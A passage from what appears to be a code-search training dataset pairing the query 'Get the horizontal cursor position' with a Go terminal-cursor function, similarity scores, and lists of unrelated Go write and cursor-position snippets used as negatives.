FIXEDSTR:\n\n checkSize(len(data[*pos:]), l)\n // Pads the string with 0's to fill the specified length l.\n copy(data[*pos:*pos+l], str)\n *pos += l\n\n case EOFSTR:\n\n checkSize(len(data[*pos:]), len(str))\n // Copies the string into the data.\n *pos += copy(data[*pos:], str)\n }\n}", "func (d *Download) Write(b []byte) (int, error) {\n\tn := len(b)\n\tatomic.AddUint64(&d.size, uint64(n))\n\treturn n, nil\n}", "func WriteString(w io.Writer, data string) error {\n\treturn WriteBytes(w, []byte(data))\n}", "func (*FileSystemBase) Write(path string, buff []byte, ofst int64, fh uint64) int {\n\treturn -ENOSYS\n}", "func (rw *ReadWrite) PutStr_(s string) *ReadWrite {\n\tlimit(int64(len(s)))\n\trw.putInt(len(s))\n\trw.w.WriteString(s)\n\treturn rw\n}", "func Write(conn net.Conn, content string) (int, error) {\n\twriter := bufio.NewWriter(conn)\n\tnumber, err := writer.WriteString(content)\n\tif err == nil {\n\t\terr = writer.Flush()\n\t}\n\treturn number, err\n}", "func (w Writer) writeString(s string) error {\n\t_, err := w.w.WriteString(s)\n\treturn err\n}", "func (a ReverseHttpFile) Write(n []byte) (int, error) {\n\treturn 0, syscall.EPERM\n}", "func WriteString(buffer []byte, offset int, value string) {\n WriteBytes(buffer, offset, []byte(value))\n}", "func (c *COM) Write(buffer string) uint32 {\n\tfor i := 0; i < len(buffer); i++ {\n\t\tc.WriteB(buffer[i])\n\t}\n\treturn uint32(len(buffer))\n}", "func (dw *DataWriter) WriteString(value string) error {\n\tbytes := []rune(value)\n\tbytesNumber := uint16(len(bytes))\n\terr := binary.Write(dw.w, binary.BigEndian, bytesNumber)\n\tif err != nil {\n\t\treturn err\n\t}\n\trunes := []rune(value)\n\tfor _, r := range runes {\n\t\t_, err = dw.w.WriteRune(r)\n\t}\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (s *StreamBuffer) WriteStringRun(str string) (n int, err error) {\n\treturn s.WriteRuneRun([]rune(str))\n}", "func (w *ByteCountWriter) Write(data []byte) (int, error) {\n\tatomic.AddInt64(&w.written, int64(len(data)))\n\treturn len(data), nil\n}", "func (g *ginGzipWriter) WriteString(s string) (int, error) {\n\treturn g.wrapper.Write([]byte(s))\n}", "func (r *MockReadWriteCloser) Write(p []byte) (n int, err error) {\n\n\tif err = r.WriteErr; err != nil {\n\t\tr.BytesWritten = p\n\t\tn = len(p)\n\t}\n\treturn\n}", "func (_e *MockWriteBufferJsonBased_Expecter) WriteString(logicalName interface{}, bitLength interface{}, encoding interface{}, value interface{}, writerArgs ...interface{}) *MockWriteBufferJsonBased_WriteString_Call {\n\treturn &MockWriteBufferJsonBased_WriteString_Call{Call: _e.mock.On(\"WriteString\",\n\t\tappend([]interface{}{logicalName, bitLength, encoding, value}, writerArgs...)...)}\n}", "func (_e *MockWriteBufferXmlBased_Expecter) WriteString(logicalName interface{}, bitLength interface{}, encoding interface{}, value interface{}, writerArgs ...interface{}) *MockWriteBufferXmlBased_WriteString_Call {\n\treturn &MockWriteBufferXmlBased_WriteString_Call{Call: _e.mock.On(\"WriteString\",\n\t\tappend([]interface{}{logicalName, bitLength, encoding, value}, writerArgs...)...)}\n}", "func (w *win) WriteString(str string) {\n\tw.Addr(\"#%d\", w.pAddr)\n\tdata := []byte(str + \"\\n\")\n\tw.writeData(data)\n\n\tnr := utf8.RuneCount(data)\n\tw.pAddr += nr\n\tw.eAddr += nr\n}", "func (n *NetConn) Write([]byte) (numBytes int, err error) {\n\treturn 1, n.errOnWrite\n}", "func (D Disk) Write(S string) error {\n\tS += string(itob(D.recNun)) + string(itob(D.getOfset()-16))\n\t_, err := D.filePnt.Write([]byte(S))\n\tD.recNun++\n\treturn err\n}", "func (mc *MockConn) Write(b []byte) (n int, err error) {\n\tif mc.closed {\n\t\treturn 0, errors.New(\"Connection closed.\")\n\t}\n\n\tdata := make([]byte, len(b))\n\tcopy(data, b)\n\tmc.sendChan <- data\n\treturn len(b), nil\n}", "func Write(L *lua.LState) int {\n\tn := checkLuaNetClient(L, 1)\n\tdata := L.CheckString(2)\n\n\tif (n.writeTimeout) > 0 {\n\t\tn.SetWriteDeadline(time.Now().Add(n.readTimeout))\n\t}\n\tcount, err := n.Write([]byte(data))\n\tif err != nil {\n\t\tL.Push(lua.LNumber(count))\n\t\tL.Push(lua.LString(err.Error()))\n\t\treturn 2\n\t}\n\n\tL.Push(lua.LNumber(count))\n\treturn 1\n}", "func WriteString(conn io.Writer, str string) error {\n\tvalue := fmt.Sprintf(\"%s\\n\", str)\n\tbytes := []byte(value)\n\t_, err := conn.Write(bytes)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (b *Writer) Write(buf []byte) (n int, err error)", "func (s *Stream) Write(p []byte) (int, error) {\n\tif s.closing {\n\t\treturn 0, ErrWriteAfterClosing\n\t}\n\tn, err := s.file.Write(p)\n\ts.b.Wrote(n)\n\treturn n, err\n}", "func (w *Writer) WriteString(str string) {\n\tlength := util.UTF16Length(str)\n\tswitch {\n\tcase length == 0:\n\t\tw.writeByte(TagEmpty)\n\tcase length < 0:\n\t\tw.WriteBytes(*(*[]byte)(unsafe.Pointer(&str)))\n\tcase length == 1:\n\t\tw.writeByte(TagUTF8Char)\n\t\tw.writeString(str)\n\tdefault:\n\t\tsetWriterRef(w, nil, nil)\n\t\twriteString(w, str, length)\n\t}\n}", "func (c *MetaConfig) WriteString(s string) (int, error) {\n\treturn c.Write([]byte(s))\n}", "func (d *Default) WriteString(s string) {\n\td.Writer.Write([]byte(s))\n}", "func (ch *IsaChannel) Write(b []byte) (int, error) {\n\treturn 0, nil\n}", "func (tw *TestWriter) Write(incoming []byte) (n int, err error) {\n\tif tw.mockWriteHandler != nil {\n\t\treturn tw.mockWriteHandler(incoming)\n\t}\n\n\ttw.capturedOutput = append(tw.capturedOutput, string(incoming))\n\treturn 0, nil\n}", "func WriteString(wtr io.Writer, s string) error {\n\treturn WriteBytes(wtr, []byte(s))\n}", "func (f *realFile) Write(p []byte) (n int, err error) { return f.file.Write(p) }", "func EncodeString(b *bytes.Buffer, s string) (int, error) {\n\tx := len(s)\n\ti := 0\n\n\tif x >= 0xFFFF {\n\t\treturn encodeLongString(b, s)\n\t}\n\n\tif err := b.WriteByte(STRING); err != nil {\n\t\treturn i, err\n\t}\n\n\ti++\n\n\tm := uint16(x)\n\tif err := binary.Write(b, binary.BigEndian, &m); err != nil {\n\t\treturn i, err\n\t}\n\n\ti += 2\n\n\tn, err := b.Write([]byte(s))\n\tif err != nil {\n\t\treturn i, err\n\t}\n\n\ti += n\n\n\treturn i, nil\n}", "func (p *port) Write(b []byte) (n int, err error) {\n\tn, err = p.file.Write(b)\n\treturn\n}", "func (file *Remote) Write(data []byte) (int, error) {\n\tfile.m.Lock()\n\tdefer file.m.Unlock()\n\n\tn, err := file.WriteAt(data, int64(file.pos))\n\tfile.pos += uint64(n)\n\treturn n, err\n}", "func (mock WriteCloser) Write(p []byte) (n int, err error) {\n\tmethodName := \"Write\" // nolint: goconst\n\tif mock.impl.Write != nil {\n\t\treturn mock.impl.Write(p)\n\t}\n\tif mock.callbackNotImplemented != nil {\n\t\tmock.callbackNotImplemented(mock.t, mock.name, methodName)\n\t} else {\n\t\tgomic.DefaultCallbackNotImplemented(mock.t, mock.name, methodName)\n\t}\n\treturn mock.fakeZeroWrite(p)\n}", "func (c *Conn) Write(p []byte) (n int, err error) {\n\tn, err = c.bufw.Write(p)\n\tc.bufw.Flush()\n\treturn n, err\n}", "func (tb *Textbox) WriteString(s string) (int, error) {\n\treturn tb.WriteRunes([]rune(s))\n}", "func SerialPortWrite(s string) {\n\tport.Write([]byte(s))\n}", "func (w *Writer) Write(b []byte) (n int, err error) {\n\tw.Lock()\n\tdefer w.Unlock()\n\tn = len(b)\n\twrite(w, b)\n\treturn n, err\n}", "func (f *Files) WriteFileString(name, data string) error {\n\treturn f.WriteFile(name, []byte(data))\n}", "func Write(filename string, data string) error {\n\treturn ioutil.WriteFile(filename, []byte(data), permissionsFile)\n}", "func (t *testRunner) writeString(file, data string) {\n\tt.Helper()\n\n\tnewf, err := os.CreateTemp(t.dir, \"\")\n\trequire.NoError(t, err)\n\n\t_, err = newf.WriteString(data)\n\trequire.NoError(t, err)\n\trequire.NoError(t, newf.Close())\n\n\terr = os.Rename(newf.Name(), file)\n\trequire.NoError(t, err)\n}", "func (r *WriteCounter) Write(b []byte) (n int, err error) {\n\tif nil == r {\n\t\treturn 0, errors.New(\"Invalid parameter, 'nil' value\")\n\t}\n\n\tr.numWrites++\n\tr.numBytes += uint(len(b))\n\treturn len(b), nil\n}", "func (p *Port) Write(b []byte) (int, error) {\n\treturn p.f.Write(b)\n}", "func (ws WritableString) WritableSize() int {\n\treturn WritableStringSize(string(ws))\n}", "func (c *channelWriter) Write(p []byte) (int, error) {\n\tc.channel <- p\n\treturn len(p), nil\n}", "func (w *Worker) WriteString(s string) *Worker {\n\tw.WriteData <- s\n\treturn w\n}", "func (n *ninjaWriterWithWrap) WriteString(s string) (written int, noError error) {\n\t// Always return the full length of the string and a nil error.\n\t// ninjaWriterWithWrap doesn't return errors to the caller, it saves them until Flush()\n\twritten = len(s)\n\n\tif n.err != nil {\n\t\treturn\n\t}\n\n\tconst spaceLen = 1\n\tif !n.space {\n\t\t// No space is pending, so a line wrap can't be inserted before this, so just write\n\t\t// the string.\n\t\tn.lineLen += len(s)\n\t\t_, n.err = n.writer.WriteString(s)\n\t} else if n.lineLen+len(s)+spaceLen > n.maxLineLen {\n\t\t// A space is pending, and the pending strings plus the current string would exceed the\n\t\t// maximum line length. Wrap and indent before the pending space and strings, then write\n\t\t// the pending and current strings.\n\t\t_, n.err = n.writer.WriteString(\" $\\n\")\n\t\tif n.err != nil {\n\t\t\treturn\n\t\t}\n\t\t_, n.err = n.writer.WriteString(indentString[:indentWidth*2])\n\t\tif n.err != nil {\n\t\t\treturn\n\t\t}\n\t\tn.lineLen = indentWidth*2 + n.pendingLen\n\t\ts = strings.TrimLeftFunc(s, unicode.IsSpace)\n\t\tn.pending = append(n.pending, s)\n\t\tn.writePending()\n\n\t\tn.space = false\n\t} else {\n\t\t// A space is pending but the current string would not reach the maximum line length,\n\t\t// add it to the pending list.\n\t\tn.pending = append(n.pending, s)\n\t\tn.pendingLen += len(s)\n\t\tn.lineLen += len(s)\n\t}\n\n\treturn\n}", "func (c *Conn) write(messageType int, p []byte) (n int, err error) {\n\tc.wmutex.Lock()\n\tdefer c.wmutex.Unlock()\n\tselect {\n\tcase <-c.done:\n\t\terr = ErrClosing\n\tdefault:\n\t\terr = c.ws.SetWriteDeadline(time.Now().Add(WriteTimeout))\n\t\tif err == nil {\n\t\t\terr = c.ws.WriteMessage(messageType, p)\n\t\t}\n\t}\n\tif err == nil {\n\t\tn = len(p)\n\t}\n\treturn n, err\n}", "func (w ByteWriter) Write(p []rune) (n int, err error) {\n\treturn w.Writer.Write([]byte(string(p)))\n}", "func (w *ByteWriter) MustWriteString(val string, offset int) int {\n\tif off, err := w.WriteString(val, offset); err != nil {\n\t\tpanic(err)\n\t} else {\n\t\treturn off\n\t}\n}", "func (w *ChannelWriter) Write(b []byte) (sz int, err error) {\n\tselect {\n\tcase w.c <- b:\n\t\treturn len(b), nil\n\tdefault:\n\t}\n\n\tif w.deadline.IsZero() {\n\t\tw.c <- b\n\t\treturn len(b), nil\n\t}\n\n\ttimer := time.NewTimer(w.deadline.Sub(time.Now()))\n\tdefer timer.Stop()\n\n\tselect {\n\tcase w.c <- b:\n\t\treturn len(b), nil\n\tcase <-timer.C:\n\t\treturn 0, context.DeadlineExceeded\n\t}\n}", "func (s String) Size() int { return binary.Size(s) }", "func (aio *AsyncIO) Write(b []byte) (int, error) {\n\tnw, err := aio.WriteAt(b, aio.offset)\n\taio.offset += int64(nw)\n\treturn nw, err\n}", "func WriteFileString(input string, file string, overwrite bool) error {\r\n\treturn WriteFile([]byte(input), file, overwrite)\r\n}", "func (e *Encoder) WriteString(s string) error {\n\treturn e.WriteBytes([]byte(s))\n}", "func (w *writer) Write(p []byte) (int, error) {\n\t// Avoid opening the pipe for a zero-length write;\n\t// the concrete can do these for empty blobs.\n\tif len(p) == 0 {\n\t\treturn 0, nil\n\t}\n\tif w.pw == nil {\n\t\t// We'll write into pw and use pr as an io.Reader for the\n\t\t// Upload call to S3.\n\t\tw.pr, w.pw = io.Pipe()\n\t\tw.open(w.pr, true)\n\t}\n\treturn w.pw.Write(p)\n}", "func (mr *MockFileMockRecorder) WriteString(arg0 interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"WriteString\", reflect.TypeOf((*MockFile)(nil).WriteString), arg0)\n}", "func (ctx *Context) WriteString(content string) *HTTPError {\n\tctx.setDefaultHeaders()\n\tctx.SetHeader(\"Content-Length\", strconv.Itoa(len(content)), true)\n\t// set the default content-type\n\tctx.WriteHeader(http.StatusOK)\n\n\tif _, err := ctx.ResponseWriter.Write([]byte(content)); err != nil {\n\t\treturn serverError(err)\n\t}\n\treturn nil\n}", "func WriteString(line string, filename string) error {\n\treturn WriteStrings([]string{line}, filename, \"\")\n}", "func (l *Logger) Write(p []byte) (n int, err error) {\n\tif l.flags&L_CONSOLE != 0 { // Print string to terminal before writing to file\t\n\t\tfmt.Printf(\"%v\", string(p))\n\t}\n\n\tif l.flags&L_FILE != 0 { // Write to file\n\t\tn, err := l.file.Write(p)\n\t\tif err != nil {\n\t\t\treturn n, err\n\t\t}\n\t}\n\n\treturn len(p), nil\n}", "func (r *Redactor) Write(p []byte) (n int, err error) {\n\treturn r.redactFunc(p)\n}", "func (usrwc *UnixSingleReadWriteCloser) Write(p []byte) (int, error) {\n\tvar err error\n\tif usrwc.c == nil {\n\t\tusrwc.c, err = usrwc.l.Accept()\n\t\tif err != nil {\n\t\t\treturn 0, err\n\t\t}\n\t}\n\n\treturn usrwc.c.Write(p)\n}", "func WriteStringData(str string) int {\n\treturn WriteObjectData(encoder.Serialize(str))\n}", "func (w *Writer) WriteString(v string) error {\n\t_, err := w.out.Write([]byte(v))\n\treturn err\n}" ]
[ "0.65339494", "0.6443635", "0.6394321", "0.63284874", "0.62357426", "0.62231046", "0.6221263", "0.6219123", "0.6129166", "0.611008", "0.6103962", "0.602641", "0.6001503", "0.5954072", "0.5947781", "0.58849305", "0.5862734", "0.58547515", "0.58542186", "0.5849421", "0.58125377", "0.5635474", "0.5622953", "0.560038", "0.5597137", "0.5560473", "0.5553121", "0.54789513", "0.5471907", "0.5455019", "0.5429177", "0.53979266", "0.53940475", "0.53655094", "0.53563464", "0.53544277", "0.53496826", "0.53483504", "0.5344545", "0.53211534", "0.53063226", "0.5293655", "0.5265766", "0.52588296", "0.5251518", "0.5242175", "0.5197547", "0.5196334", "0.5189061", "0.5187588", "0.51794326", "0.5168579", "0.5150432", "0.51436377", "0.51349056", "0.5132072", "0.5116974", "0.510452", "0.5097284", "0.5090769", "0.5075833", "0.5072229", "0.50531995", "0.5048851", "0.5031417", "0.50207335", "0.49939385", "0.49924263", "0.49881077", "0.49870968", "0.49856856", "0.4983308", "0.4943678", "0.4943057", "0.49302483", "0.4925154", "0.49177322", "0.49144393", "0.4907717", "0.48881704", "0.48780915", "0.48777512", "0.4872742", "0.48725376", "0.4855834", "0.48555315", "0.485514", "0.48519027", "0.48478967", "0.48416376", "0.48411253", "0.48384526", "0.48222432", "0.48219457", "0.48105153", "0.47992557", "0.47909838", "0.4782016", "0.4779931", "0.477953" ]
0.6710511
0
Get the horizontal cursor position
func getCursorPosition(ifd, ofd int) int { // query the cursor location if puts(ofd, "\x1b[6n") != 4 { return -1 } // read the response: ESC [ rows ; cols R // rows/cols are decimal number strings buf := make([]rune, 0, 32) u := utf8{} for len(buf) < 32 { r := u.getRune(ifd, &timeout20ms) if r == KeycodeNull { break } buf = append(buf, r) if r == 'R' { break } } // parse it: esc [ number ; number R (at least 6 characters) if len(buf) < 6 || buf[0] != KeycodeESC || buf[1] != '[' || buf[len(buf)-1] != 'R' { return -1 } // should have 2 number fields x := strings.Split(string(buf[2:len(buf)-1]), ";") if len(x) != 2 { return -1 } // return the cols cols, err := strconv.Atoi(x[1]) if err != nil { return -1 } return cols }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (b *Buffer) getCursorMinXPos() int {\n return b.getLineMetaChars() + 1\n}", "func (tb *Textbox) Cursor() (x, y int) {\n\treturn tb.cursor % len(tb.canvas[0]), tb.cursor / len(tb.canvas[0])\n}", "func CursorPosX(x int) string {\n\treturn Esc + strconv.Itoa(x+1) + \"G\"\n}", "func CursorPos(x, y int) string {\n\treturn Esc + strconv.Itoa(y+1) + \";\" + strconv.Itoa(x+1) + \"H\"\n}", "func GetCursorRow() (int, error) {\n\tvar row int\n\tscr := getScreen()\n\tfd := int(scr.output.Fd())\n\toldState, err := term.MakeRaw(fd)\n\tif err != nil {\n\t\treturn -1, err\n\t}\n\tdefer term.Restore(fd, oldState)\n\n\t// capture keyboard output from echo\n\treader := bufio.NewReader(os.Stdin)\n\n\t// request a \"Report Cursor Position\" response from the device: <ESC>[{ROW};{COLUMN}R\n\t// great resource: http://www.termsys.demon.co.uk/vtansi.htm\n\t_, err = fmt.Fprint(scr.output, \"\\x1b[6n\")\n\tif err != nil {\n\t\treturn -1, fmt.Errorf(\"unable to get screen position\")\n\t}\n\n\t// capture the response up until the expected \"R\"\n\ttext, err := reader.ReadSlice('R')\n\tif err != nil {\n\t\treturn -1, fmt.Errorf(\"unable to read stdin\")\n\t}\n\n\t// parse the row and column\n\tif strings.Contains(string(text), \";\") {\n\t\tre := regexp.MustCompile(`\\d+;\\d+`)\n\t\tline := re.FindString(string(text))\n\t\trow, err = strconv.Atoi(strings.Split(line, \";\")[0])\n\n\t\tif err != nil {\n\t\t\treturn -1, fmt.Errorf(\"invalid row value: '%s'\", line)\n\t\t}\n\t} else {\n\t\treturn -1, fmt.Errorf(\"unable to fetch position\")\n\t}\n\n\treturn row, nil\n}", "func (m Model) Cursor() int {\n\treturn m.pos\n}", "func (e *LineEditor) CursorLeft() {\n\n\tif e.Cx > 0 {\n\t\te.Cx--\n\t}\n}", "func (i *Input) CursorLeft() {\n\tif i.Pos > 0 {\n\t\ti.Pos--\n\t}\n}", "func (mon *Monitor) GetPosition() (int, int) {\n\tvar x, y C.int\n\tC.glfwGetMonitorPos(mon.internalPtr, &x, &y)\n\treturn int(x), int(y)\n}", "func (i *InputHandler) GetMouseX() int { return i.mouseX }", "func (o *PrivilegeUsersResponse) GetBeforeCursor() string {\n\tif o == nil || o.BeforeCursor == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.BeforeCursor\n}", "func (r *Render) toPos(cursor int) (x, y int) {\n\tcol := int(r.col)\n\treturn cursor % col, cursor / col\n}", "func GET_X_LPARAM(lp uintptr) int32 {\n\treturn int32(int16(win.LOWORD(uint32(lp))))\n}", "func (d *Display) CursorLeft() error {\n\t_, err := d.port.Write([]byte(CursorLeft))\n\treturn err\n}", "func (l *StringLexer) Cursor() int {\n\treturn l.pos\n}", "func CursorMove(x, y int) string {\n\tvar s string\n\tif x < 0 {\n\t\ts = Esc + strconv.Itoa(-x) + \"D\"\n\t} else if x > 0 {\n\t\ts = Esc + strconv.Itoa(x) + \"C\"\n\t}\n\tif y < 0 {\n\t\ts += Esc + strconv.Itoa(-y) + \"A\"\n\t} else if y > 0 {\n\t\ts += Esc + strconv.Itoa(y) + \"B\"\n\t}\n\treturn s\n}", "func GetCursorCoord() (int, int, error) {\n\tvar x, y C.int\n\n\tif C.getCursor(&x, &y) != 0 {\n\t\treturn 0, 0, fmt.Errorf(\"failed to read cursor location\")\n\t}\n\treturn int(x), int(y), nil\n}", "func (win *Window) CursorPos() image.Point {\n\t// get pixel position (may be different than world pos if window is scaled).\n\t//\n\t// e.g. for a window (640x480) scaled to 100%x50% (i.e. 640x240), then if the\n\t// cursor is at pixel (10, 10) in the window the returned world position\n\t// would be (10, 20) since those would be the world coordinates of what the\n\t// mouse cursor actually hovers over.\n\tpixelPos := C.sfMouse_getPosition((*C.sfWindow)(unsafe.Pointer(win.win)))\n\t// convert pixel position to world position.\n\tcoordPos := C.sfRenderWindow_mapPixelToCoords(win.win, pixelPos, nil)\n\treturn image.Pt(int(math.Round(float64(coordPos.x))), int(math.Round(float64(coordPos.y))))\n}", "func Position() (x, y int32) {\n\treturn internal.MousePositionX, internal.MousePositionY\n}", "func (o *Cell) GetPrevX() int { return o.X }", "func CursorPosY(y int) string {\n\treturn Esc + strconv.Itoa(y+1) + \"d\"\n}", "func GetMousePosition() (x, y int) {\n\treturn getMousePosition()\n}", "func (m *WorkbookWorksheet) GetPosition()(*int32) {\n return m.position\n}", "func (d Display) GetMouseX() int {\n\treturn int(C.caca_get_mouse_x(d.Dp))\n}", "func (tv *TextView) CursorStartLine() {\n\twupdt := tv.TopUpdateStart()\n\tdefer tv.TopUpdateEnd(wupdt)\n\ttv.ValidateCursor()\n\torg := tv.CursorPos\n\tpos := tv.CursorPos\n\n\tgotwrap := false\n\tif wln := tv.WrappedLines(pos.Ln); wln > 1 {\n\t\tsi, ri, _ := tv.WrappedLineNo(pos)\n\t\tif si > 0 {\n\t\t\tri = 0\n\t\t\tnwc, _ := tv.Renders[pos.Ln].SpanPosToRuneIdx(si, ri)\n\t\t\tpos.Ch = nwc\n\t\t\ttv.CursorPos = pos\n\t\t\ttv.CursorCol = ri\n\t\t\tgotwrap = true\n\t\t}\n\t}\n\tif !gotwrap {\n\t\ttv.CursorPos.Ch = 0\n\t\ttv.CursorCol = tv.CursorPos.Ch\n\t}\n\t// fmt.Printf(\"sol cursorcol: %v\\n\", tv.CursorCol)\n\ttv.SetCursor(tv.CursorPos)\n\ttv.ScrollCursorToLeft()\n\ttv.RenderCursor(true)\n\ttv.CursorSelect(org)\n}", "func (w *WindowWidget) CurrentPosition() (x, y float32) {\n\tpos := w.getState().currentPosition\n\treturn pos.X, pos.Y\n}", "func (w *Window) Position() (x, y float64) {\n\tvar out struct {\n\t\tX float64\n\t\tY float64\n\t}\n\n\tif err := driver.macRPC.Call(\"windows.Position\", &out, struct {\n\t\tID string\n\t}{\n\t\tID: w.ID().String(),\n\t}); err != nil {\n\t\tpanic(err)\n\t}\n\treturn out.X, out.Y\n}", "func (g *GitStatusWidget) GetHighlightenPos() int {\n\treturn g.renderer.GetCursor()\n}", "func setCursorLoc(x, y int) {\n\tfmt.Printf(\"\\033[%v;%vH\", y, x)\n}", "func (s *vSite) X() int {\n\treturn int(s.cell.Center.X)\n}", "func (o *InputEventScreenDrag) GetPosition() gdnative.Vector2 {\n\t//log.Println(\"Calling InputEventScreenDrag.GetPosition()\")\n\n\t// Build out the method's arguments\n\tptrArguments := make([]gdnative.Pointer, 0, 0)\n\n\t// Get the method bind\n\tmethodBind := gdnative.NewMethodBind(\"InputEventScreenDrag\", \"get_position\")\n\n\t// Call the parent method.\n\t// Vector2\n\tretPtr := gdnative.NewEmptyVector2()\n\tgdnative.MethodBindPtrCall(methodBind, o.GetBaseObject(), ptrArguments, retPtr)\n\n\t// If we have a return type, convert it from a pointer into its actual object.\n\tret := gdnative.NewVector2FromPointer(retPtr)\n\treturn ret\n}", "func moveCursorLeft(positionCursor *int, numberDigits int,listOfNumbers [6]int) {\n\n\tif *positionCursor == 0 { \t\t\t\t\t\t // Scenario 1: position of cursor at the beginning of list\n\n\t\t*positionCursor=numberDigits-1\t\t\t\t // set it to the end\n\n\t\tpositionCursor = &listOfNumbers[numberDigits-1] // sets address of position to be that of the correct element\n\n\t} else {\t\t\t\t\t\t\t\t\t\t // Scenario 2: position of cursor is not at the beginning of list\n\n\t\t*positionCursor--\t\t\t\t\t\t\t // decrease the value of position of the cursor\n\n\t\tvar temp = *positionCursor\t\t\t\t\t // temp variable for position of cursor\n\n\t\tpositionCursor = &listOfNumbers[temp] \t // sets address of position to be that of the correct element\n\t}\n}", "func (o *Dig) GetPosX() int32 {\n\tif o == nil {\n\t\tvar ret int32\n\t\treturn ret\n\t}\n\n\treturn o.PosX\n}", "func (w *MainWindow) MousePos() (int, int) {\n\treturn int(w.mouseX), int(w.mouseY)\n}", "func MoveTopLeft() {\n\tfmt.Print(\"\\033[H\")\n}", "func (p asciiTable) X(c int) float64 {\n\treturn p.minX + float64(c)*p.resolution\n}", "func GuiTextBoxGetCursor() int {\n\tres := C.GuiTextBoxGetCursor()\n\treturn int(int32(res))\n}", "func (w *WidgetImplement) Cursor() Cursor {\n\treturn w.cursor\n}", "func (tv *TextView) ScrollCursorToHorizCenter() bool {\n\tcurBBox := tv.CursorBBox(tv.CursorPos)\n\tmid := (curBBox.Min.X + curBBox.Max.X) / 2\n\treturn tv.ScrollToHorizCenter(mid)\n}", "func (b *BaseElement) GetScrollLeft() int32 {\n\treturn b.sl\n}", "func (o *PaginationPageInfo) GetStartCursor() string {\n\tif o == nil || o.StartCursor == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.StartCursor\n}", "func FindTopLeftCoord(character []string, longestStringLen int) (int, int) {\n\tscreenX, screenY := Screen.Size()\n\txpos := (screenX - longestStringLen) / 2\n\typos := (screenY - len(character)) / 2\n\treturn xpos, ypos\n}", "func (r *Reader) GetPosition() int {\n\treturn r.position\n}", "func GetLineIndex(v *gocui.View) int {\n\t_, cy := v.Cursor()\n\treturn cy\n}", "func getCharsLeftCount(limit int, position Point, dir Point) int {\n\tleft := 0\n\t// increase counter while position is not out of boundaries of grid\n\tfor !outOfBound(position, limit) {\n\t\tposition.x += dir.x\n\t\tposition.y += dir.y\n\t\tleft++\n\t}\n\n\treturn left\n}", "func CursorPrevLine(n int) {\n\tfmt.Printf(CSI+CursorPreviousLineSeq, n)\n}", "func (s *Scanner) GetPosition() token.Position { return s.reader.Pos }", "func CursorPrevLine(count int) string {\n\treturn fmt.Sprintf(\"%s%dF\", csi, count)\n}", "func (b *baseComponent) GetMouseRelativePos() rl.Vector2 {\n\tmouse := rl.GetMousePosition()\n\treturn rl.Vector2{\n\t\tX: (mouse.X - b.GetX()) / b.GetWidth(),\n\t\tY: (mouse.Y - b.GetY()) / b.GetHeight(),\n\t}\n}", "func (v *mandelbrotViewer) mouseLocation() (float64, float64) {\n\tmX, mY := ebiten.CursorPosition()\n\tmouseRe := float64(mX)/(float64(*widthFlag)/(v.rMax-v.rMin)) + v.rMin\n\tmouseIm := float64(mY)/(float64(*heightFlag)/(v.iMax-v.iMin)) + v.iMin\n\n\treturn mouseRe, mouseIm\n}", "func CalcMousePos(w *glfw.Window) {\n\tw.SetCursorPosCallback(cbCursor)\n}", "func (e *LineEditor) CursorHome() {\n\te.Cx = 0\n}", "func (tv *TextView) PixelToCursor(pt image.Point) TextPos {\n\tif tv.NLines == 0 {\n\t\treturn TextPosZero\n\t}\n\tsty := &tv.Sty\n\tyoff := float32(tv.WinBBox.Min.Y)\n\tstln := tv.FirstVisibleLine(0)\n\tcln := stln\n\tfls := tv.CharStartPos(TextPos{Ln: stln}).Y - yoff\n\tif pt.Y < int(mat32.Floor(fls)) {\n\t\tcln = stln\n\t} else if pt.Y > tv.WinBBox.Max.Y {\n\t\tcln = tv.NLines - 1\n\t} else {\n\t\tgot := false\n\t\tfor ln := stln; ln < tv.NLines; ln++ {\n\t\t\tls := tv.CharStartPos(TextPos{Ln: ln}).Y - yoff\n\t\t\tes := ls\n\t\t\tes += mat32.Max(tv.Renders[ln].Size.Y, tv.LineHeight)\n\t\t\tif pt.Y >= int(mat32.Floor(ls)) && pt.Y < int(mat32.Ceil(es)) {\n\t\t\t\tgot = true\n\t\t\t\tcln = ln\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif !got {\n\t\t\tcln = tv.NLines - 1\n\t\t}\n\t}\n\t// fmt.Printf(\"cln: %v pt: %v\\n\", cln, pt)\n\tlnsz := tv.Buf.LineLen(cln)\n\tif lnsz == 0 {\n\t\treturn TextPos{Ln: cln, Ch: 0}\n\t}\n\txoff := float32(tv.WinBBox.Min.X)\n\tscrl := tv.WinBBox.Min.X - tv.ObjBBox.Min.X\n\tnolno := pt.X - int(tv.LineNoOff)\n\tsc := int(float32(nolno+scrl) / sty.Font.Face.Metrics.Ch)\n\tsc -= sc / 4\n\tsc = ints.MaxInt(0, sc)\n\tcch := sc\n\n\tsi := 0\n\tspoff := 0\n\tnspan := len(tv.Renders[cln].Spans)\n\tlstY := tv.CharStartPos(TextPos{Ln: cln}).Y - yoff\n\tif nspan > 1 {\n\t\tsi = int((float32(pt.Y) - lstY) / tv.LineHeight)\n\t\tsi = ints.MinInt(si, nspan-1)\n\t\tsi = ints.MaxInt(si, 0)\n\t\tfor i := 0; i < si; i++ {\n\t\t\tspoff += len(tv.Renders[cln].Spans[i].Text)\n\t\t}\n\t\t// fmt.Printf(\"si: %v spoff: %v\\n\", si, spoff)\n\t}\n\n\tri := sc\n\trsz := len(tv.Renders[cln].Spans[si].Text)\n\tif rsz == 0 {\n\t\treturn TextPos{Ln: cln, Ch: spoff}\n\t}\n\t// fmt.Printf(\"sc: %v rsz: %v\\n\", sc, rsz)\n\n\tc, _ := tv.Renders[cln].SpanPosToRuneIdx(si, rsz-1) // end\n\trsp := mat32.Floor(tv.CharStartPos(TextPos{Ln: cln, Ch: c}).X - xoff)\n\trep := mat32.Ceil(tv.CharEndPos(TextPos{Ln: cln, Ch: c}).X - xoff)\n\tif int(rep) < pt.X { // end of line\n\t\tif si == nspan-1 {\n\t\t\tc++\n\t\t}\n\t\treturn TextPos{Ln: cln, Ch: c}\n\t}\n\n\ttooBig := false\n\tgot := false\n\tif ri < rsz {\n\t\tfor rii := ri; 